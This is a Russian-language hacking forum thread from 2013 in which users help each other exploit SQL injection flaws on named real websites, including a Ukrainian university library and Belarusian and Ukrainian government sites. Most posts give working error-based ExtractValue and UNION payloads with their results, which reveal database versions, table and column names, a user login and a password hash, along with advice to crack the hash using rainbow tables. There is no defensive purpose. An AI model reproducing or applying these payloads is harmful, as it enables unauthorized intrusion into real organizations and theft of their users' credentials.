30.01.2013, 00:52
|
|
Постоянный
Регистрация: 27.07.2011
Сообщений: 499
С нами:
7787126
Репутация:
53
|
|
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' GROUP BY kilop ORDER' at line 56
и дальше идет листинг больщого Select Запроса.
первый раз вообще вижу такую шляпу. крутится?
|
|
|
30.01.2013, 03:37
|
|
Новичок
Регистрация: 31.05.2012
Сообщений: 22
С нами:
7342166
Репутация:
0
|
|
ребят, уязвимость в поле поиска - при подставке кавычки выдаёт -
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `path` LIKE '%vds%' AND `ntitle` LIKE '%'%'' at line 1
как правильно составлять запрос...?
|
|
|
|
30.01.2013, 04:07
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от justonline
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' GROUP BY kilop ORDER' at line 56
и дальше идет листинг больщого Select Запроса.
первый раз вообще вижу такую шляпу. крутится?
Нужен весь запрос, или хотя бы урл.
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `path` LIKE '%vds%' AND `ntitle` LIKE '%'%'' at line 1
Попробуй так
' and 1='1
' and 1='2
И сравни результаты.
|
|
|
|
30.01.2013, 12:33
|
|
Новичок
Регистрация: 31.05.2012
Сообщений: 22
С нами:
7342166
Репутация:
0
|
|
Сообщение от BigBear
Попробуй так
' and 1='1
' and 1='2
И сравни результаты.
Ни то ни другое не работает... Вот урл -
http://lib.pntu.edu.ua/?module=vds*section-84
|
|
|
|
30.01.2013, 13:18
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от LelouchMe
Ни то ни другое не работает... Вот урл -
http://lib.pntu.edu.ua/?module=vds*section-84
'and(1)='1 TRUE
'and(2)='1 FALSE
Режутся пробелы. Можно юзать только беспробельные варианты.
Ещё чуток покручу - выложу тут запросы.
UPD.
'and(extractvalue(1,concat(0x3a,(select( @@version)))))='
XPATH syntax error: ': 5.1.49-3'
'and(extractvalue(1,concat(0x3a,(select( database())))))='
XPATH syntax error: ': lib_bd'
|
|
|
|
30.01.2013, 14:06
|
|
Новичок
Регистрация: 31.05.2012
Сообщений: 22
С нами:
7342166
Репутация:
0
|
|
Сообщение от BigBear
XPATH syntax error:
То есть дальше посимвольный перебор...?
плюсую...)+
|
|
|
|
30.01.2013, 15:12
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от LelouchMe
То есть дальше посимвольный перебор...?
плюсую...)+
Не надо посимвольного перебора.
Я ж тебе докрутил до Error-Based. Теперь только через ошибку.
Да тебе и этого выше крыши.
|
|
|
|
30.01.2013, 15:32
|
|
Новичок
Регистрация: 31.05.2012
Сообщений: 22
С нами:
7342166
Репутация:
0
|
|
Сообщение от BigBear
Не надо посимвольного перебора.
Я ж тебе докрутил до Error-Based. Теперь только через ошибку.
Да тебе и этого выше крыши.
Да, я понял, спасибо, просто в "слепых" ещё слабо разбираюсь...
Короче по такой схеме крутить я так понял:
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+limit+0,1)))--
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+where+table_schema!='in formation_schema'+limit+0,1)))--
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+where+table_schema!='in formation_schema'+limit+3,1)))--
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+where+table_schema!='in formation_schema'+limit+4,1)))--
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,login,password)+from+users1+l imit+0,1)))--
или как тут
Сообщение от M_script
Слепая инъекция. Пробел, слэши и некоторые другие символы использовать нельзя из-за ограничений HTTP-протокола. Есть вывод через ошибку с помощью ExtractValue
Запрос
:
Код:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,version())))='1
Результат
:
Из-за того, что нет пробела, использовать limit нельзя. group_concat тоже не работает. Обходится через дополнительные условия, в данном случае колонка data_length в information_schema.tables
Запрос
:
Код:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(concat(table_schema,'.',table_name))from(information_schema.tables)where`table_name`like(0x257573657225)and(data_length>0)))))='1
Результат
:
Для перебора колонок используется ordinal_position в information_schema.columns, в которой хранится порядковый номер колонки в таблице
Запрос
:
Код:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(column_name)from(information_schema.columns)where`table_name`='users'and(ordinal_position=1)))))='1
Меняя ordinal_position от 1 до 6, получаем имена всех колонок
Результат
:
Код:
ID,login,password,name,email,comment
В таблице users всего одна запись. Получаем имя
Запрос
:
Код:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(login)from(users)where(id=1)))))='1
Результат
:
Так как вывод через ExtractValue ограничен 31 символом, хэш пароля получаем двумя запросами
Запрос 1
:
Код:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(password)from(users)where(id=1)))))='1
Запрос 2
:
Код:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,mid((select(password)from(users)where(id=1)),32,1))))='1
Результат
:
Код:
79e4b4438aba2b6d8e1caf9568e73e12
Расшифровываем хэш по радужным таблицам.
Результат
:
|
|
|
|
30.01.2013, 22:45
|
|
Новичок
Регистрация: 31.05.2012
Сообщений: 22
С нами:
7342166
Репутация:
0
|
|
Да, кстати, а кто подскажет что это такое...?)
Вроде как не слепая... С такой ещё не стыкался...
http://www.rada-poltava.gov.ua/news/1'00000000'/
|
|
|
|
31.01.2013, 01:44
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от LelouchMe
Да, кстати, а кто подскажет что это такое...?)
Вроде как не слепая... С такой ещё не стыкался...
http://www.rada-poltava.gov.ua/news/1'00000000'/
http://www.rada-poltava.gov.ua/news/-25398276'union select 1,2,concat_ws(0x3a, user(), version()),4-- /
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
